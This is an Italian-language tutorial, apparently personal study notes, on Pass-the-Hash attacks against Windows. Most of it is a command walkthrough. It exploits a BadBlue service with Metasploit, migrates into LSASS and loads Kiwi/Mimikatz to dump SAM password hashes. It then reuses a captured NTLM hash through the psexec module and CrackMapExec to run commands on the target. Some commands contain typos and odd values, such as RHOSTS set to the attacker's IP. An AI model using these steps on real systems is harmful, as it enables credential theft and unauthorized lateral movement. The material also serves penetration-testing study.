Pass-The-Hash Attacks
Cybersecurity
Il Pass the Hash è una tecnica di attacco che consente di autenticarsi su sistemi remoti utilizzando direttamente l’hash NTLM della password, senza conoscerne il testo in chiaro. Sfrutta la gestione dell’autenticazione in Windows per muoversi lateralmente nella rete e ottenere accesso non autorizzato. E' possibile effettuare questo tipo di attacco con diversi tool:
Metsploit PsExec module
Crackmapexec
service postgresql start && msfconsole
search badblue

use 1
set RHOSTS target_ip
exploit
Una volta aperta la sessione di meterpreter
pgrep lsass
migrate ID_PROCESS
getuid load kiwi

lsa_dump_sam ? estrae gli hash delle password memorizzati nel SAM (Security Account Manager) di Windows leggendo direttamente il database locale. Questi hash possono poi essere usati in attacchi come pass the hash.
Kiwi ? è l’implementazione di Mimikatz integrata in Metasploit. Permette di dumpare credenziali in chiaro, hash NTLM, ticket Kerberos e molto altro, agendo direttamente nella memoria del processo LSASS.

hashdump
background//mettiamo la sessione in background
search psexec
use exploit/windows/smb/psexec
set LPORT 4422 //scegliamo una porta differente da quella della sessione aperte precedentemente
set RHOSTS ip_attaccante
set SMBUser Administrator
set SMBPass “hash catturato in precedenza”
set target Native\ upload
exploit

la sessione precedente posso anche terminarla non’è piu necessaria
session -K
L’exploit funzionerà lo stesso[windows/smb/psexec]
Testiamo crackmapexec
crackmapexec smb -u Administratror -H “hash da incollare” -x “ipconfig”
crackmapexec smb -u Administratror -H “hash da incollare” -x “net user Administrator”